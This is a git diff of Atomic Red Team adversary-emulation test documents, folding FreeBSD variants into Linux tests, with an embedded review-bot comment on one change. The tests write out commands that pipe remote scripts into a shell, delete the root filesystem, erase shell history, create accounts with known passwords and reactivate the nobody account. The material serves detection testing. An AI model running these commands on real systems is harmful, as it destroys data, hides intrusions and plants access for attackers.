- -## Atomic Test #11 - Change login shell +## Atomic Test #10 - Change login shell An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user. **Supported Platforms:** Linux @@ -422,7 +384,7 @@ An adversary may want to use a different login shell. The chsh command changes t ```bash -useradd -s /bin/bash art +[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art cat /etc/passwd |grep ^art chsh -s /bin/sh art cat /etc/passwd |grep ^art @@ -430,7 +392,7 @@ cat /etc/passwd |grep ^art #### Cleanup Commands: ```bash -userdel art +[ "$(uname)" = 'FreeBSD' ] && rmuser -y art || userdel art ``` @@ -452,54 +414,7 @@ echo "Automated installer not implemented yet, please install chsh manually"

-## Atomic Test #12 - Change login shell (freebsd) -An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user. - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 33b68b9b-4988-4caf-9600-31b7bf04227c - - - - - - -#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) - - -```sh -pw useradd art -g wheel -s /bin/csh -cat /etc/passwd |grep ^art -chsh -s /bin/sh art -cat /etc/passwd |grep ^art -``` - -#### Cleanup Commands: -```sh -rmuser -y art -``` - - - -#### Dependencies: Run with `sh`! -##### Description: chsh - change login shell, must be installed -##### Check Prereq Commands: -```sh -if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi -``` -##### Get Prereq Commands: -```sh -echo "Automated installer not implemented yet, please install chsh manually" -``` - - - - -
-
- -## Atomic Test #13 - Environment variable scripts +## Atomic Test #11 - Environment variable scripts An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash **Supported Platforms:** Linux @@ -512,39 +427,6 @@ An adversary may place scripts in an environment variable because they can't or -#### Attack Commands: Run with `bash`! - - -```bash -export ART='echo "Atomic Red Team was here... T1059.004"' -echo $ART |/bin/bash -``` - -#### Cleanup Commands: -```bash -unset ART -``` - - - - - -
-
- -## Atomic Test #14 - Environment variable scripts (freebsd) -An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 663b205d-2121-48a3-a6f9-8c9d4d87dfee - - - - - - #### Attack Commands: Run with `sh`! @@ -565,7 +447,7 @@ unset ART

-## Atomic Test #15 - Detecting pipe-to-shell +## Atomic Test #12 - Detecting pipe-to-shell An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command. **Supported Platforms:** Linux @@ -583,34 +465,31 @@ An adversary may develop a useful utility or subvert the CI/CD pipe line of a le | remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh| -#### Attack Commands: Run with `bash`! +#### Attack Commands: Run with `sh`! -```bash +```sh cd /tmp -curl -s #{remote_url} -ls -la /tmp/art.txt curl -s #{remote_url} |bash ls -la /tmp/art.txt ``` #### Cleanup Commands: -```bash +```sh rm /tmp/art.txt ``` #### Dependencies: Run with `bash`! -##### Description: Check if running on a Debian based machine. +##### Description: Check if curl is installed on the machine. ##### Check Prereq Commands: ```bash -if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi ``` ##### Get Prereq Commands: ```bash -apt update && apt install -y curl +which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl ``` @@ -619,61 +498,7 @@ apt update && apt install -y curl
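Review bot: The attack commands now drop the first `curl -s #{remote_url}` / `ls -la /tmp/art.txt` pair, but the description just above still says the script is downloaded "the first time without piping it to bash and the second piping it into bash"; that non-piped fetch was the control showing the file only appears when piped, so either restore it or rewrite the description to match. The executor was switched to `sh` to cover FreeBSD, yet the payload is still piped into `bash`, which is not in the FreeBSD base system — `curl -s #{remote_url} | sh` would match the executor change, assuming pipe-to-shell.sh is POSIX-sh compatible. The prerequisite installer uses the same ungrouped `which apt && ... || which pkg && ...` chain as the index files, which runs `pkg update` after a successful apt install; wrap each alternative in parentheses.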

-## Atomic Test #16 - Detecting pipe-to-shell (freebsd) -An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command. - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 1a06b1ec-0cca-49db-a222-3ebb6ef25632 - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh| - - -#### Attack Commands: Run with `sh`! - - -```sh -cd /tmp -curl -s #{remote_url} -ls -la /tmp/art.txt -curl -s #{remote_url} |bash -ls -la /tmp/art.txt -``` - -#### Cleanup Commands: -```sh -rm /tmp/art.txt -``` - - - -#### Dependencies: Run with `sh`! -##### Description: Check if running on a Debian based machine. -##### Check Prereq Commands: -```sh -if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi -if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi -``` -##### Get Prereq Commands: -```sh -pkg update && pkg install -y curl -``` - - - - -
-
- -## Atomic Test #17 - Current kernel information enumeration +## Atomic Test #13 - Current kernel information enumeration An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information. **Supported Platforms:** Linux diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index 2870812d3..ed14bcd04 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md 
@@ -18,41 +18,27 @@ Adversaries may run the PowerShell command Clear-History to flush t - [Atomic Test #1 - Clear Bash history (rm)](#atomic-test-1---clear-bash-history-rm) -- [Atomic Test #2 - Clear sh history (rm)](#atomic-test-2---clear-sh-history-rm) +- [Atomic Test #2 - Clear Bash history (echo)](#atomic-test-2---clear-bash-history-echo) -- [Atomic Test #3 - Clear Bash history (echo)](#atomic-test-3---clear-bash-history-echo) +- [Atomic Test #3 - Clear Bash history (cat dev/null)](#atomic-test-3---clear-bash-history-cat-devnull) -- [Atomic Test #4 - Clear sh history (echo)](#atomic-test-4---clear-sh-history-echo) +- [Atomic Test #4 - Clear Bash history (ln dev/null)](#atomic-test-4---clear-bash-history-ln-devnull) -- [Atomic Test #5 - Clear Bash history (cat dev/null)](#atomic-test-5---clear-bash-history-cat-devnull) +- [Atomic Test #5 - Clear Bash history (truncate)](#atomic-test-5---clear-bash-history-truncate) -- [Atomic Test #6 - Clear sh history (cat dev/null)](#atomic-test-6---clear-sh-history-cat-devnull) +- [Atomic Test #6 - Clear history of a bunch of shells](#atomic-test-6---clear-history-of-a-bunch-of-shells) -- [Atomic Test #7 - Clear Bash history (ln dev/null)](#atomic-test-7---clear-bash-history-ln-devnull) +- [Atomic Test #7 - Clear and Disable Bash History Logging](#atomic-test-7---clear-and-disable-bash-history-logging) -- [Atomic Test #8 - Clear sh history (ln dev/null)](#atomic-test-8---clear-sh-history-ln-devnull) +- [Atomic Test #8 - Use Space Before Command to Avoid Logging to History](#atomic-test-8---use-space-before-command-to-avoid-logging-to-history) -- [Atomic Test #9 - Clear Bash history (truncate)](#atomic-test-9---clear-bash-history-truncate) +- [Atomic Test #9 - Disable Bash History Logging with SSH -T](#atomic-test-9---disable-bash-history-logging-with-ssh--t) -- [Atomic Test #10 - Clear sh history (truncate)](#atomic-test-10---clear-sh-history-truncate) +- [Atomic Test #10 - Prevent Powershell History 
Logging](#atomic-test-10---prevent-powershell-history-logging) -- [Atomic Test #11 - Clear history of a bunch of shells](#atomic-test-11---clear-history-of-a-bunch-of-shells) +- [Atomic Test #11 - Clear Powershell History by Deleting History File](#atomic-test-11---clear-powershell-history-by-deleting-history-file) -- [Atomic Test #12 - Clear history of a bunch of shells (freebsd)](#atomic-test-12---clear-history-of-a-bunch-of-shells-freebsd) - -- [Atomic Test #13 - Clear and Disable Bash History Logging](#atomic-test-13---clear-and-disable-bash-history-logging) - -- [Atomic Test #14 - Use Space Before Command to Avoid Logging to History](#atomic-test-14---use-space-before-command-to-avoid-logging-to-history) - -- [Atomic Test #15 - Disable Bash History Logging with SSH -T](#atomic-test-15---disable-bash-history-logging-with-ssh--t) - -- [Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd)](#atomic-test-16---disable-sh-history-logging-with-ssh--t-freebsd) - -- [Atomic Test #17 - Prevent Powershell History Logging](#atomic-test-17---prevent-powershell-history-logging) - -- [Atomic Test #18 - Clear Powershell History by Deleting History File](#atomic-test-18---clear-powershell-history-by-deleting-history-file) - -- [Atomic Test #19 - Set Custom AddToHistoryHandler to Avoid History File Logging](#atomic-test-19---set-custom-addtohistoryhandler-to-avoid-history-file-logging) +- [Atomic Test #12 - Set Custom AddToHistoryHandler to Avoid History File Logging](#atomic-test-12---set-custom-addtohistoryhandler-to-avoid-history-file-logging)
@@ -69,12 +55,17 @@ Clears bash history via rm +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| history_path | Bash history path | path | ~/.bash_history| + #### Attack Commands: Run with `sh`! ```sh -rm ~/.bash_history +rm #{history_path} ``` @@ -85,35 +76,7 @@ rm ~/.bash_history

-## Atomic Test #2 - Clear sh history (rm) -Clears sh history via rm - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 448893f8-1d5d-4ae2-9017-7fcd73a7e100 - - - - - - -#### Attack Commands: Run with `sh`! - - -```sh -rm ~/.sh_history -``` - - - - - - -
-
- -## Atomic Test #3 - Clear Bash history (echo) +## Atomic Test #2 - Clear Bash history (echo) Clears bash history via echo **Supported Platforms:** Linux @@ -125,12 +88,17 @@ Clears bash history via echo +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| history_path | Bash history path | path | ~/.bash_history| + #### Attack Commands: Run with `sh`! ```sh -echo "" > ~/.bash_history +echo "" > #{history_path} ``` @@ -141,35 +109,7 @@ echo "" > ~/.bash_history

-## Atomic Test #4 - Clear sh history (echo) -Clears sh history via echo - -**Supported Platforms:** Linux - - -**auto_generated_guid:** a4d63cb3-9ed9-4837-9480-5bf6b09a6c96 - - - - - - -#### Attack Commands: Run with `sh`! - - -```sh -echo "" > ~/.sh_history -``` - - - - - - -
-
- -## Atomic Test #5 - Clear Bash history (cat dev/null) +## Atomic Test #3 - Clear Bash history (cat dev/null) Clears bash history via cat /dev/null **Supported Platforms:** Linux, macOS @@ -181,12 +121,17 @@ Clears bash history via cat /dev/null +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| history_path | Bash history path | path | ~/.bash_history| + #### Attack Commands: Run with `sh`! ```sh -cat /dev/null > ~/.bash_history +cat /dev/null > #{history_path} ``` @@ -197,35 +142,7 @@ cat /dev/null > ~/.bash_history

-## Atomic Test #6 - Clear sh history (cat dev/null) -Clears sh history via cat /dev/null - -**Supported Platforms:** Linux - - -**auto_generated_guid:** ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc - - - - - - -#### Attack Commands: Run with `sh`! - - -```sh -cat /dev/null > ~/.sh_history -``` - - - - - - -
-
- -## Atomic Test #7 - Clear Bash history (ln dev/null) +## Atomic Test #4 - Clear Bash history (ln dev/null) Clears bash history via a symlink to /dev/null **Supported Platforms:** Linux, macOS @@ -237,12 +154,17 @@ Clears bash history via a symlink to /dev/null +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| history_path | Bash history path | path | ~/.bash_history| + #### Attack Commands: Run with `sh`! ```sh -ln -sf /dev/null ~/.bash_history +ln -sf /dev/null #{history_path} ``` @@ -253,35 +175,7 @@ ln -sf /dev/null ~/.bash_history

-## Atomic Test #8 - Clear sh history (ln dev/null) -Clears sh history via a symlink to /dev/null - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 3126aa7a-8768-456f-ae05-6ab2d4accfdd - - - - - - -#### Attack Commands: Run with `sh`! - - -```sh -ln -sf /dev/null ~/.sh_history -``` - - - - - - -
-
- -## Atomic Test #9 - Clear Bash history (truncate) +## Atomic Test #5 - Clear Bash history (truncate) Clears bash history via truncate **Supported Platforms:** Linux @@ -293,12 +187,17 @@ Clears bash history via truncate +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| history_path | Bash history path | path | ~/.bash_history| + #### Attack Commands: Run with `sh`! ```sh -truncate -s0 ~/.bash_history +truncate -s0 #{history_path} ``` @@ -309,35 +208,7 @@ truncate -s0 ~/.bash_history

-## Atomic Test #10 - Clear sh history (truncate) -Clears sh history via truncate - -**Supported Platforms:** Linux - - -**auto_generated_guid:** e14d9bb0-c853-4503-aa89-739d5c0a5818 - - - - - - -#### Attack Commands: Run with `sh`! - - -```sh -truncate -s0 ~/.sh_history -``` - - - - - - -
-
- -## Atomic Test #11 - Clear history of a bunch of shells +## Atomic Test #6 - Clear history of a bunch of shells Clears the history of a bunch of different shell types by setting the history size to zero **Supported Platforms:** Linux, macOS @@ -367,39 +238,7 @@ history -c

-## Atomic Test #12 - Clear history of a bunch of shells (freebsd) -Clears the history of a bunch of different shell types by setting the history size to zero - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0 - - - - - - -#### Attack Commands: Run with `sh`! - - -```sh -unset HISTFILE -unset histfile -export HISTFILESIZE=0 -export HISTSIZE=0 -history -c -``` - - - - - - -
-
- -## Atomic Test #13 - Clear and Disable Bash History Logging +## Atomic Test #7 - Clear and Disable Bash History Logging Clears the history and disable bash history logging of the current shell and future shell sessions **Supported Platforms:** Linux, macOS @@ -436,7 +275,7 @@ set -o history

-## Atomic Test #14 - Use Space Before Command to Avoid Logging to History +## Atomic Test #8 - Use Space Before Command to Avoid Logging to History Using a space before a command causes the command to not be logged in the Bash History file **Supported Platforms:** Linux, macOS @@ -465,7 +304,7 @@ whoami

-## Atomic Test #15 - Disable Bash History Logging with SSH -T +## Atomic Test #9 - Disable Bash History Logging with SSH -T Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog **Supported Platforms:** Linux @@ -487,7 +326,7 @@ sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname #### Cleanup Commands: ```sh -userdel -f testuser1 +[ "$(uname)" = 'FreeBSD' ] && rmuser -y testuser1 || userdel -f testuser1 ``` @@ -500,9 +339,9 @@ $(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null) ``` ##### Get Prereq Commands: ```sh -/usr/sbin/useradd testuser1 -echo -e 'pwd101!\npwd101!' | passwd testuser1 -(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass) +[ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1 +[ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1 +(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass) ``` @@ -511,53 +350,7 @@ echo -e 'pwd101!\npwd101!' | passwd testuser1

-## Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd) -Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog - -**Supported Platforms:** Linux - - -**auto_generated_guid:** ec3f2306-dd19-4c4b-bed7-92d20e9b1dee - - - - - - -#### Attack Commands: Run with `sh`! - - -```sh -sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname -``` - -#### Cleanup Commands: -```sh -rmuser -y testuser1 -``` - - - -#### Dependencies: Run with `sh`! -##### Description: Install sshpass and create user account used for excuting -##### Check Prereq Commands: -```sh -$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null) -``` -##### Get Prereq Commands: -```sh -pw useradd testuser1 -g wheel -s /bin/sh -echo 'pwd101!' | pw mod user testuser1 -h 0 -(which pkg && pkg install -y sshpass) -``` - - - - -
-
- -## Atomic Test #17 - Prevent Powershell History Logging +## Atomic Test #10 - Prevent Powershell History Logging Prevents Powershell history **Supported Platforms:** Windows @@ -589,7 +382,7 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally

-## Atomic Test #18 - Clear Powershell History by Deleting History File +## Atomic Test #11 - Clear Powershell History by Deleting History File Clears Powershell history **Supported Platforms:** Windows @@ -617,7 +410,7 @@ Remove-Item (Get-PSReadlineOption).HistorySavePath

-## Atomic Test #19 - Set Custom AddToHistoryHandler to Avoid History File Logging +## Atomic Test #12 - Set Custom AddToHistoryHandler to Avoid History File Logging The "AddToHistoryHandler" receives the current command as the $line variable and then returns $true if the line should be written to the history file. Here we simply return $false so nothing gets added to the history file for the current session. diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md index 87ea4a1f9..f4f4893d2 100644 --- a/atomics/T1070.004/T1070.004.md +++ b/atomics/T1070.004/T1070.004.md @@ -22,11 +22,9 @@ There are tools available from the host operating system to perform cleanup, but - [Atomic Test #8 - Delete Filesystem - Linux](#atomic-test-8---delete-filesystem---linux) -- [Atomic Test #9 - Delete Filesystem - FreeBSD](#atomic-test-9---delete-filesystem---freebsd) +- [Atomic Test #9 - Delete Prefetch File](#atomic-test-9---delete-prefetch-file) -- [Atomic Test #10 - Delete Prefetch File](#atomic-test-10---delete-prefetch-file) - -- [Atomic Test #11 - Delete TeamViewer Log Files](#atomic-test-11---delete-teamviewer-log-files) +- [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files)
@@ -354,40 +352,11 @@ This test deletes the entire root filesystem of a Linux system. This technique w -#### Attack Commands: Run with `bash`! - - -```bash -rm -rf / --no-preserve-root > /dev/null 2> /dev/null -``` - - - - - - -
-
- -## Atomic Test #9 - Delete Filesystem - FreeBSD -This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - -**Supported Platforms:** Linux - - -**auto_generated_guid:** b5aaca7e-a48f-4f1b-8f0f-a27b8f516608 - - - - - - #### Attack Commands: Run with `sh`! ```sh -chflags -R 0 / -rm -rf / > /dev/null 2> /dev/null +[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null ``` @@ -398,7 +367,7 @@ rm -rf / > /dev/null 2> /dev/null

-## Atomic Test #10 - Delete Prefetch File +## Atomic Test #9 - Delete Prefetch File Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" before and after the test to verify that the number of prefetch files decreases by 1. @@ -427,7 +396,7 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$

-## Atomic Test #11 - Delete TeamViewer Log Files +## Atomic Test #10 - Delete TeamViewer Log Files Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md index 81abcf9b1..e5d8fd30c 100644 --- a/atomics/T1074.001/T1074.001.md +++ b/atomics/T1074.001/T1074.001.md @@ -10,9 +10,7 @@ Adversaries may also stage collected data in various available formats/locations - [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh) -- [Atomic Test #3 - Stage data from Discovery.sh (freebsd)](#atomic-test-3---stage-data-from-discoverysh-freebsd) - -- [Atomic Test #4 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-4---zip-a-folder-with-powershell-for-staging-in-temp) +- [Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-3---zip-a-folder-with-powershell-for-staging-in-temp)
@@ -67,39 +65,6 @@ Utilize curl to download discovery.sh and execute a basic information gathering -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| output_file | Location to save downloaded discovery.bat file | path | /tmp/T1074.001_discovery.log| - - -#### Attack Commands: Run with `bash`! - - -```bash -curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} -``` - - - - - - -
-
- -## Atomic Test #3 - Stage data from Discovery.sh (freebsd) -Utilize curl to download discovery.sh and execute a basic information gathering shell script - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 4fca7b49-379d-4493-8890-d6297750fa46 - - - - - #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| @@ -113,18 +78,22 @@ Utilize curl to download discovery.sh and execute a basic information gathering curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file} ``` +#### Cleanup Commands: +```sh +rm #{output_file} +``` #### Dependencies: Run with `sh`! -##### Description: Check if curl is installed. +##### Description: Check if curl is installed on the machine. ##### Check Prereq Commands: ```sh -if [ ! -x "$(command -v curl)" ]; then exit 1; else exit 0; fi; +if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi ``` ##### Get Prereq Commands: ```sh -(which pkg && pkg install -y curl) +which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl ``` @@ -133,7 +102,7 @@ if [ ! -x "$(command -v curl)" ]; then exit 1; else exit 0; fi;

-## Atomic Test #4 - Zip a Folder with PowerShell for Staging in Temp +## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index fefdeb4f0..86375758f 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -22,15 +22,13 @@ Local Accounts may also be abused to elevate privileges and harvest credentials - [Atomic Test #8 - Create local account (Linux)](#atomic-test-8---create-local-account-linux) -- [Atomic Test #9 - Create local account (FreeBSD)](#atomic-test-9---create-local-account-freebsd) +- [Atomic Test #9 - Reactivate a locked/expired account (Linux)](#atomic-test-9---reactivate-a-lockedexpired-account-linux) -- [Atomic Test #10 - Reactivate a locked/expired account (Linux)](#atomic-test-10---reactivate-a-lockedexpired-account-linux) +- [Atomic Test #10 - Reactivate a locked/expired account (FreeBSD)](#atomic-test-10---reactivate-a-lockedexpired-account-freebsd) -- [Atomic Test #11 - Reactivate a locked/expired account (FreeBSD)](#atomic-test-11---reactivate-a-lockedexpired-account-freebsd) +- [Atomic Test #11 - Login as nobody (Linux)](#atomic-test-11---login-as-nobody-linux) -- [Atomic Test #12 - Login as nobody (Linux)](#atomic-test-12---login-as-nobody-linux) - -- [Atomic Test #13 - Login as nobody (freebsd)](#atomic-test-13---login-as-nobody-freebsd) +- [Atomic Test #12 - Login as nobody (freebsd)](#atomic-test-12---login-as-nobody-freebsd)
@@ -289,15 +287,14 @@ An adversary may wish to create an account with admin privileges to work with. I ```bash -useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art -su art -whoami -exit +password=$(openssl passwd -1 art) +([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) +su art -c "whoami; exit" ``` #### Cleanup Commands: ```bash -userdel -r art +[ "$(uname)" = 'Linux' ] && userdel art -rf || rmuser -y art ``` @@ -307,43 +304,7 @@ userdel -r art

-## Atomic Test #9 - Create local account (FreeBSD) -An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user. - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 95158cc9-8f6d-4889-9531-9be3f7f095e0 - - - - - - -#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) - - -```sh -pw useradd art -g wheel -s /bin/sh -echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 -su art -whoami -exit -``` - -#### Cleanup Commands: -```sh -rmuser -y art -``` - - - - - -
-
- -## Atomic Test #10 - Reactivate a locked/expired account (Linux) +## Atomic Test #9 - Reactivate a locked/expired account (Linux) A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account. @@ -384,7 +345,7 @@ userdel -r art

-## Atomic Test #11 - Reactivate a locked/expired account (FreeBSD) +## Atomic Test #10 - Reactivate a locked/expired account (FreeBSD) A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account. @@ -426,7 +387,7 @@ rmuser -y art

-## Atomic Test #12 - Login as nobody (Linux) +## Atomic Test #11 - Login as nobody (Linux) An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. **Supported Platforms:** Linux @@ -466,7 +427,7 @@ cat /etc/passwd |grep nobody

-## Atomic Test #13 - Login as nobody (freebsd) +## Atomic Test #12 - Login as nobody (freebsd) An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. **Supported Platforms:** Linux diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index a274c99d0..2bb05cf54 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -16,17 +16,15 @@ Commands such as net user and net localgroup of the [N - [Atomic Test #5 - Show if a user account has ever logged in remotely](#atomic-test-5---show-if-a-user-account-has-ever-logged-in-remotely) -- [Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd)](#atomic-test-6---show-if-a-user-account-has-ever-logged-in-remotely-freebsd) +- [Atomic Test #6 - Enumerate users and groups](#atomic-test-6---enumerate-users-and-groups) - [Atomic Test #7 - Enumerate users and groups](#atomic-test-7---enumerate-users-and-groups) -- [Atomic Test #8 - Enumerate users and groups](#atomic-test-8---enumerate-users-and-groups) +- [Atomic Test #8 - Enumerate all accounts on Windows (Local)](#atomic-test-8---enumerate-all-accounts-on-windows-local) -- [Atomic Test #9 - Enumerate all accounts on Windows (Local)](#atomic-test-9---enumerate-all-accounts-on-windows-local) +- [Atomic Test #9 - Enumerate all accounts via PowerShell (Local)](#atomic-test-9---enumerate-all-accounts-via-powershell-local) -- [Atomic Test #10 - Enumerate all accounts via PowerShell (Local)](#atomic-test-10---enumerate-all-accounts-via-powershell-local) - -- [Atomic Test #11 - Enumerate logged on users via CMD (Local)](#atomic-test-11---enumerate-logged-on-users-via-cmd-local) +- [Atomic Test #10 - Enumerate logged on users via CMD (Local)](#atomic-test-10---enumerate-logged-on-users-via-cmd-local)
@@ -209,7 +207,8 @@ Show if a user account has ever logged in remotely
 ```sh
-lastlog > #{output_file}
+[ "$(uname)" = 'FreeBSD' ] && cmd="lastlogin" || cmd="lastlog"
+$cmd > #{output_file}
 cat #{output_file}
 ```
@@ -237,45 +236,7 @@ sudo apt-get install login; exit 1;

-## Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd) -Show if a user account has ever logged in remotely - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 0f73418f-d680-4383-8a24-87bc97fe4e35 - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| output_file | Path where captured results will be placed | path | /tmp/T1087.001.txt| - - -#### Attack Commands: Run with `sh`! - - -```sh -lastlogin > #{output_file} -cat #{output_file} -``` - -#### Cleanup Commands: -```sh -rm -f #{output_file} -``` - - - - - -
-
-
-## Atomic Test #7 - Enumerate users and groups
+## Atomic Test #6 - Enumerate users and groups
 Utilize groups and id to enumerate users and groups **Supported Platforms:** Linux, macOS
@@ -304,7 +265,7 @@ id

-## Atomic Test #8 - Enumerate users and groups
+## Atomic Test #7 - Enumerate users and groups
 Utilize local utilities to enumerate users and groups **Supported Platforms:** macOS
@@ -336,7 +297,7 @@ dscacheutil -q user

-## Atomic Test #9 - Enumerate all accounts on Windows (Local)
+## Atomic Test #8 - Enumerate all accounts on Windows (Local)
 Enumerate all accounts Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session
@@ -369,7 +330,7 @@ net localgroup

